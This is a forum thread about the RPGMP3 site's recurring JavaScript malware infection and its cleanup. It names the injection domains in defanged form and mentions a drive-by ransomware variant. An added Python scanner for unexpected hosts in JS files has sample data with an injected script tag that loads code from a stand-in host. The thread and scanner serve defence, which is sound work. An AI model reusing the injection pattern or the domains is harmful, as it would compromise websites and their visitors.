74 replies to this topic

#41 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 27 February 2016 - 08:35 PM

We are working with the host now to try and figure out what is going on.

 

They are disabling and cleaning files and monitoring for reinfection so we can try and figure out how to fix this for good.......

 

Grrrrrr!

 

Hal :hal:


  • 0

#42 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 28 February 2016 - 05:51 AM

Reinfection has occurred. Affected files include, but may not be limited to: lang-sql.js, lightbox.js, prettify.js, ips.ibEconomyMemPane.js, main.js, jquery.js.

Dodgy domain this time is js DOT zelenuenogotochki DOT info/hellomylittlepiggy/
  • 0

#43 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 28 February 2016 - 04:36 PM

Okay, once again some JS files are infected and some aren't - so there are no cross-domain requests to dodgy URLs if you just go to the homepage, but there are if you then navigate to the Gallery, for instance.

I don't want to retype everything I've just posted on the Facebook page - but this is important. In an earlier version of this infection campaign against other websites, IF you were using IE11 AND you had a screen resolution greater than 800x600, an attempt would be made (after further domain redirects) to carry out a drive-by ransomware install attempt against you. So avoiding THAT browser is very important.

The list of dodgy domains involved keeps growing. I'm not sure if there's any benefit from my continuing to post the ones involved as their replacements might just be randomly generated a day or so later and not everyone knows how to block them with a Hosts file anyway. Still, the current two in this site's infected JS files are:

js DOT sinienogotochki DOT info
news DOT beluihameleon DOT info

A safe way to check for infection without actually coming on this site is to go to https://aw-snap.info/file-viewer/ and type rpgmp3.com into the search box there. It finds the infected JS files more effectively than me navigating around the site and looking at them with Firefox addons!
  • 0
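
An added example, not part of the post above and not the site's own code: one way a site owner could run the same kind of check locally, by listing every hostname that the site's JS files reference and flagging any that are not on an expected list. The allowlist contents, the sample file contents and the `.invalid` hostname are constructed assumptions; an injection that builds its URL at runtime would not be found this way and needs a comparison against a clean copy instead.

```python
import re
import sys
from pathlib import Path

# Hosts the site is expected to reference from its own JS (assumed allowlist).
ALLOWED_HOSTS = {"rpgmp3.com", "www.rpgmp3.com", "ajax.googleapis.com"}

# Absolute URLs, or protocol-relative ones that directly follow a quote or "(".
# Requiring the quote keeps ordinary "//comment" lines from matching.
URL_RE = re.compile(
    r"""(?:https?:|(?<=["'(]))//([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)""",
    re.IGNORECASE,
)

def external_hosts(js_source):
    """Return the hostnames referenced in js_source that are not allowlisted."""
    hosts = {m.group(1).lower() for m in URL_RE.finditer(js_source)}
    return hosts - ALLOWED_HOSTS

def scan(files):
    """files maps path -> JS text; returns {path: sorted unexpected hosts}."""
    report = {}
    for path, text in files.items():
        found = external_hosts(text)
        if found:
            report[path] = sorted(found)
    return report

def load_tree(root):
    """Read every .js file under root into a {path: text} mapping."""
    return {
        str(p): p.read_text(errors="replace")
        for p in Path(root).rglob("*.js")
    }

# Constructed sample: one clean file, one with an injected remote script tag.
SAMPLE = {
    "js/main.js": 'var base = "https://www.rpgmp3.com/forum/";\n',
    "js/lightbox.js": "// lightbox.js v2\n"
    'document.write(\'<script src="//js.bad-example.invalid/x/"></script>\');\n',
}

if __name__ == "__main__":
    # With a directory argument, scan that web root; otherwise scan the sample.
    files = load_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for path, hosts in scan(files).items():
        print(f"{path}: unexpected host(s) {', '.join(hosts)}")
```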

#44 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 29 February 2016 - 02:23 PM

We have attempted to cleanse the server with holy fire... We have lost a bunch of stuff but it seems to be the only sure fire way to get this resolved.

 

We have damaged the site code by killing files but she should be able to reload from a clean copy once we are officially clean and server is hardened a little more.

 

Fingers are firmly crossed...

 

Thanks to all who are helping with this. It has been a total nightmare...

 

Hal :hal:


  • 0

#45 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 29 February 2016 - 04:05 PM

So far... the site has NOT been reinfected! Woo-hoo! Let's hope this keeps up.

 

In case anyone encounters this hack on another website (and it was widespread on a lot of WordPress and Joomla sites, rpgmp3 will not be the only one recently affected), here are all the dodgy domains I know about that were involved in hacks on this site and in the same hack on other sites so far, in a format suitable for blocking in your Hosts file should you know how to use it:

 

(Note: This is mostly the result of me googling for lists of domains involved when other sites were hacked in this way. Only a few of these domains were involved in the RPGMP3 hack.)


  • 0

#46 Lockhart

Lockhart

    Yorkton Gamer & RPGMP3 Professional

  • Administrators
  • 1,238 posts
  • Amazon Wishlist
  • LocationRegina, SK, Canada

Posted 29 February 2016 - 05:56 PM

Huzzah!

 

What was lost? Site seems pretty intact from my user perspective.


  • 0

#47 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 01 March 2016 - 06:10 AM

Will recent episodes start making it to iTunes now?
  • 0

#48 Thing

Thing

    a Bad Man

  • Administrators
  • 12,601 posts
  • LocationNear Seattle, WA, USA

Posted 01 March 2016 - 09:02 AM

Now that it looks like the site is clean (from a malware standpoint at least, we are still a bit filthy at times ;) ) we need to update and replace some files that the hosting company's abuse team disabled and deleted, and do a bit more proactive hardening against future issues.  The podcast feeds should be getting updated pretty soon, but the details on that are up to Hal.


  • 2

#49 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 01 March 2016 - 09:50 AM

There is a massive amount of content in The Vault to release as the contributors have been uploading unabated while the main site has had issues - the contributor uploader is separate to the site itself.

 

I also have a large number of Pathfinder recordings from our group to release so expect to see that shortly as well.

 

I am waiting for the green light from Google that they consider the site clean - hopefully get that today and then I'll start to release more stuff at a rapid rate to catch up.

 

Thanks to everyone who stuck with us through this horrid nightmare and special thanks to all the site users who have been helping Thing and I out - you guys rock!

 

Prepare your ear holes for a tsunami of awesome tabletop audio goodness...

 

Hal :hal:


  • 4

#50 Hafwit 2.0

Hafwit 2.0

    Goblin

  • Members
  • 161 posts
  • LocationSvendborg, Denmark

Posted 01 March 2016 - 12:22 PM

Woo! Thank you all for your hard work.  :)


  • 1

#51 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 01 March 2016 - 03:57 PM

Three cheers for Hal and Thing and all the rest here on RPGMP3.com
  • 4

#52 kendoyle659

kendoyle659

    RPGMP3 Patron

  • Patrons
  • 446 posts
  • LocationYork

Posted 02 March 2016 - 09:59 AM

Hip Hip Hurray


  • 1

#53 ThistledownJohn

ThistledownJohn

    Ghoul

  • Members
  • 532 posts
  • LocationBonne Terre, MO USA

Posted 02 March 2016 - 01:31 PM

Great news!  :D


  • 0

#54 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 02 March 2016 - 03:20 PM

:)

 

Looks like we are still clear... time to get back to normal running :D

 

Hal :hal:


  • 2

#55 Lucky_Strike

Lucky_Strike

    Goblin

  • Patrons
  • 204 posts
  • Amazon Wishlist
  • LocationLittle Rock, AR

Posted 02 March 2016 - 05:16 PM

Well done! Appreciate the hard work and looking forward to the new audio.
  • 0

#56 Skyth

Skyth

    Kobold

  • Members
  • 71 posts

Posted 06 March 2016 - 12:12 PM

Looking forward to more recordings.  Been going through withdrawals at work...Had to start listening to Beer and Battle ;)


  • 1

#57 Hal

Hal

    Site Owner

  • Administrators
  • 8,097 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 08 March 2016 - 11:36 AM

Seems we are back fixed and secure with any luck... (again)

 

I will be releasing content from The Vault over the next few days and then I am going to establish a release schedule so we can avoid these feast or famine moments as much as possible :)

 

How does that sound?

 

Hal :hal:


  • 1

#58 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 08 March 2016 - 01:43 PM

Inconceivable! That is how it sounds.
  • 0

#59 ThistledownJohn

ThistledownJohn

    Ghoul

  • Members
  • 532 posts
  • LocationBonne Terre, MO USA

Posted 08 March 2016 - 05:12 PM

Seems we are back fixed and secure with any luck... (again)

 

I will be releasing content from The Vault over the next few days and then I am going to establish a release schedule so we can avoid these feast or famine moments as much as possible :)

 

How does that sound?

 

Hal :hal:

 

Sounds like sweet, sweet music.  :D


  • 1

#60 Lockhart

Lockhart

    Yorkton Gamer & RPGMP3 Professional

  • Administrators
  • 1,238 posts
  • Amazon Wishlist
  • LocationRegina, SK, Canada

Posted 08 March 2016 - 06:03 PM

Sounds like I should get back to the Yorkton Editing and Release mines.


  • 1



